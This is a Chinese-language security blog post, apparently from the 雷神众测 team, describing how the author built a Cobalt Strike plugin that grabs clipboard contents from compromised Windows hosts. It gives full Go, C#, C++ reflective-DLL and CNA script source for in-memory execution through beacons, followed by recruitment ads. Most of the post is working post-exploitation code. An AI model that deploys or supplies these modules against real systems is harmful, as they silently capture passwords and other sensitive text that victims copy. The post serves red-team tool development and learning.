STATEMENT

声明

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，雷神众测及文章作者不为此承担任何责任。

雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章，必须保证此文章的完整性，包括版权声明等全部内容。未经雷神众测允许，不得任意修改或者增减此文章内容，不得以任何方式将其用于商业目的。

NO.1 前言

逛了逛github、论坛，发现没有cs插件获得剪贴板内容，那就写一个。

首先，cs可以通过execute_assembly进行内存加载c# 的程序，或者用dll反射(当然也可以传exe到被控机，写成插件就少了上传到部分)

用到的知识点：
c# 语法
cna编写语法
vs 2019

NO.2 尝试

先用go试试

go源码

package mainimport (    "github.com/atotto/clipboard")func main() {    // 读取剪切板中的内容到字符串    content, err := clipboard.ReadAll()    if err != nil {        panic(err)    }    println(content)}

编译、上传、执行(可以正常输出，但是吧，多一个上传的步骤！！！一个小功能还得2步操作，就很不智能，还是接着换思路吧)

c# 实现-最开始的思路

通过execute\_assembly内存加载c# 的程序(c# 基本上不咋会，先去看了官方示例

https://docs.microsoft.com/en-us/dotnet/api/system.windows.forms.clipboard?view=net-5.0)

然后找了找现成的代码(先实现再优化！！！)

using System;using System.Windows.Forms;public class MainClass{    public static void Main(string[] args){        IDataObject iData = Clipboard.GetDataObject();        if (iData.GetDataPresent(DataFormats.Text))        {            Console.WriteLine((String)iData.GetData(DataFormats.Text));        }    }}

编译-测试，报错。
好的，不愧是ctrl+c\v过来的

添加个[STAThread]，解决报错问题，重新编译，搞定

复制的内容为：mimikatz-2.2.0-20210724

上cs报错

返回去看代码，总感觉是System.Windows.Forms的问题

提供的是丰富的用户界面功能！！！果然，纯命令行应该是调用不起来

c++编写反射dll

先写一个c++获取剪贴板，再改成反射dll

参考链接：[渗透技巧——Windows下剪贴板的利用]

https://3gstudent.github.io/Windows%E4%B8%8B%E5%89%AA%E8%B4%B4%E6%9D%BF%E7%9A%84%E5%88%A9%E7%94%A8

# include <windows.h># include <iostream>
BOOL GetTextFromClipboard(){    if (::OpenClipboard(NULL))    {
        HGLOBAL hMem = GetClipboardData(CF_TEXT);        if (NULL != hMem)        {            char* lpStr = (char*)::GlobalLock(hMem);            if (NULL != lpStr)            {                printf("%s", lpStr);                ::GlobalUnlock(hMem);            }        }        ::CloseClipboard();        return TRUE;    }    return FALSE;}int main(int argc, char* argv[]){    GetTextFromClipboard();    return 0;}

编译之后可以使用，但还是和go编写的使用思路一样，上传再执行

改成反射dll主要是参考倾旋师傅的

[通过反射DLL注入来构建后渗透模块]

https://payloads.online/archivers/2020-03-02/1

拉取反射dll的经典项目

[stephenfewer/ReflectiveDLLInjection]

https://github.com/stephenfewer/ReflectiveDLLInjection

直接vs打开，编译生成dll试试

圈中的部分就是调用MessageBoxA弹个窗口，反射dll成功

MessageBoxA( NULL, "Hello from DllMain!", "Reflective Dll Injection", MB_OK );

编写cna，把cna、dll放在一个目录下(或者cna可以调用到的路径)

popup beacon_bottom {  menu "反射dll测试" {    item "反射dll测试"{    bdllspawn!($1, script_resource('reflective_dll.dll'), $null,"MessageBox",1000);    }
  }}

MessageBox成功弹出

接下来将MessageBoxA的部分替换成获取剪贴板的代码。
后缀改成cpp，include一些方法，extern "C"的主要作用就是为了能够正确实现C++代码调用其他C语言代码，再把GetTextFromClipboard()函数复制过来

但是，cs调用无回显，感觉是输出的问题

改成弹框输出试试

弹框成功，reflective_dll.exp为复制的内容

再改下输出，改用cout控制台输出，生成dll、测试

cs调用成功输出，复制内容是vs编译过程的输出，中英文正常

到这里基本上实现了设想，一键获取剪贴板内容，但是并不是最初的设想，内存加载c# 获得剪贴板

ReflectiveDll.cpp源码

//===============================================================================================//// This is a stub for the actuall functionality of the DLL.//===============================================================================================//# include "ReflectiveLoader.h"# include <windows.h># include <stdio.h># include <iostream># include <string>
// Note: REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR and REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN are// defined in the project properties (Properties->C++->Preprocessor) so as we can specify our own // DllMain and use the LoadRemoteLibraryR() API to inject this DLL.
// You can use this value as a pseudo hinstDLL value (defined and set via ReflectiveLoader.c)extern "C" HINSTANCE hAppInstance;//===============================================================================================//
BOOL GetTextFromClipboard(){    if (::OpenClipboard(NULL))    {        std::string res;        HGLOBAL hMem = GetClipboardData(CF_TEXT);        if (NULL != hMem)        {            char* lpStr = (char*)::GlobalLock(hMem);            if (NULL != lpStr)            {                res.append(lpStr);                //MessageBoxA(NULL, "Hello from DllMain!", lpStr, MB_OK);                ::GlobalUnlock(hMem);            }        }        std::cout << res << std::endl;        ::CloseClipboard();        return TRUE;    }    return FALSE;}BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved ){    BOOL bReturnValue = TRUE;  switch( dwReason )     {     case DLL_QUERY_HMODULE:      if( lpReserved != NULL )        *(HMODULE *)lpReserved = hAppInstance;      break;    case DLL_PROCESS_ATTACH:      hAppInstance = hinstDLL;            GetTextFromClipboard();            //MessageBoxA( NULL, "Hello from DllMain!", "Reflective Dll Injection", MB_OK );      break;    case DLL_PROCESS_DETACH:    case DLL_THREAD_ATTACH:    case DLL_THREAD_DETACH:            break;    }  return bReturnValue;}

c# 调用user32.dll完成

c++代码中获得剪贴板调用的方法是[GetClipboardData]

https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getclipboarddata

调用的dll是user32.dll

知道思路之后，就去找现成的代码(主要是c# 中的DllImport太复杂)，找到了半成品的[C# 控制台程序实现 Ctrl + V 粘贴功能]

https://www.cnblogs.com/feiyuhuo/p/5077220.html

但也不能直接用，改下直接输出，复制的内容还是输出的过程，但是中文变成了?

接着看c# 的代码，ASCIIEncoding.ASCII.GetString将buffer里面的ASCII码转成字符串，应该是这个地方转码出现了问题

找了个文章[ASP.NET 或C# 中ASCII码含中文字符的编解码处理]

https://blog.csdn.net/boonya/article/details/80422936

再做两次转换。第一次转换，将传入的信息，转成ASCII码的一长串

第二次转换，将ASCII码的一长串转换成原本复制的内容，成功解决了乱码的问题

本地测试，复制内容是之前的生成过程输出的内容

c#源码

using System;using System.Text;using System.Runtime.InteropServices;
class ClipBoard{    [DllImport("user32.dll", SetLastError = true)]    private static extern Int32 IsClipboardFormatAvailable(uint format);
    [DllImport("user32.dll", SetLastError = true)]    private static extern Int32 OpenClipboard(IntPtr hWndNewOwner);
    [DllImport("user32.dll", SetLastError = true)]    private static extern IntPtr GetClipboardData(uint uFormat);
    [DllImport("user32.dll", SetLastError = true)]    private static extern Int32 CloseClipboard();
    [DllImport("kernel32.dll", SetLastError = true)]    private static extern Int32 GlobalLock(IntPtr hMem);
    [DllImport("kernel32.dll", SetLastError = true)]    private static extern Int32 GlobalUnlock(IntPtr hMem);
    [DllImport("kernel32.dll")]    public static extern UIntPtr GlobalSize(IntPtr hMem);
    const uint CF_TEXT = 1;
    public static string PasteTextFromClipboard(){        string result = "";        if (IsClipboardFormatAvailable(CF_TEXT) == 0)        {            return result;        }        if (OpenClipboard((IntPtr)0) == 0)        {            return result;        }
        IntPtr hglb = GetClipboardData(CF_TEXT);        if (hglb != (IntPtr)0)        {            UIntPtr size = GlobalSize(hglb);            IntPtr s = (IntPtr)GlobalLock(hglb);            byte[] buffer = new byte[(int)size];            Marshal.Copy(s, buffer, 0, (int)size);            if (s != null)            {                string textAscii = string.Empty;                for (int i = 0; i < buffer.Length; i++)                {                    textAscii += buffer[i].ToString("X");                }                result = textAscii;                GlobalUnlock(hglb);            }
        }
        CloseClipboard();        return result;    }
    private static void Main(){        string s = ClipBoard.PasteTextFromClipboard();        int k = 0;//字节移动偏移量
        byte[] buffer = new byte[s.Length / 2];//存储变量的字节
        for (int i = 0; i < s.Length / 2; i++)        {            //每两位合并成为一个字节            buffer[i] = byte.Parse(s.Substring(k, 2), System.Globalization.NumberStyles.HexNumber);            k = k + 2;        }        //将字节转化成汉字        Console.WriteLine(Encoding.Default.GetString(buffer));    }}

NO.3 cna插件编写

集成了反射dll、内存加载获得剪贴板两种方式，将dll、exe都放在同一目录即可

popup beacon_bottom {  menu "获得剪贴板内容" {    item "反射dll"{    btask($1,"反射dll获得剪贴板内容");    bdllspawn!($1, script_resource("reflective_dll_Clipboard.dll"),$null, 10000);    }    item "内存加载c#"{    btask($1,"内存加载c#获得剪贴板内容");    bexecute_assembly($1, script_resource('Csharp_Clipboard.exe'), "");    }  }}

测试过程，成功打到最初的想法，下一步可能在加个功能，识别是文件直接回传下载

NO.4 参考

- C# 中\[STAThread\]的作用

https://www.cnblogs.com/gyc19920704/p/6509926.html

- 渗透技巧——Windows下剪贴板的利用

https://3gstudent.github.io/Windows%E4%B8%8B%E5%89%AA%E8%B4%B4%E6%9D%BF%E7%9A%84%E5%88%A9%E7%94%A8

- 通过反射DLL注入来构建后渗透模块

https://payloads.online/archivers/2020-03-02/1

- system.windows.forms.clipboard

https://docs.microsoft.com/en-us/dotnet/api/system.windows.forms.clipboard?view=net-5.0

- stephenfewer/ReflectiveDLLInjection

https://github.com/stephenfewer/ReflectiveDLLInjection

- GetClipboardData

https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getclipboarddata

- ASP.NET 或C# 中ASCII码含中文字符的编解码处理

https://blog.csdn.net/boonya/article/details/80422936

RECRUITMENT

招聘启事

安恒雷神众测SRC运营（实习生）
————————
【职责描述】
1.  负责SRC的微博、微信公众号等线上新媒体的运营工作，保持用户活跃度，提高站点访问量；
2.  负责白帽子提交漏洞的漏洞审核、Rank评级、漏洞修复处理等相关沟通工作，促进审核人员与白帽子之间友好协作沟通；
3.  参与策划、组织和落实针对白帽子的线下活动，如沙龙、发布会、技术交流论坛等；
4.  积极参与雷神众测的品牌推广工作，协助技术人员输出优质的技术文章；
5.  积极参与公司媒体、行业内相关媒体及其他市场资源的工作沟通工作。

【任职要求】 
 1.  责任心强，性格活泼，具备良好的人际交往能力；
 2.  对网络安全感兴趣，对行业有基本了解；
 3.  良好的文案写作能力和活动组织协调能力。

简历投递至 

[email protected]

设计师（实习生）

————————

简历投递至 

[email protected]

安全招聘

简历投递至

[email protected]

岗位：红队武器化Golang开发工程师

[email protected]

END

长按识别二维码关注我们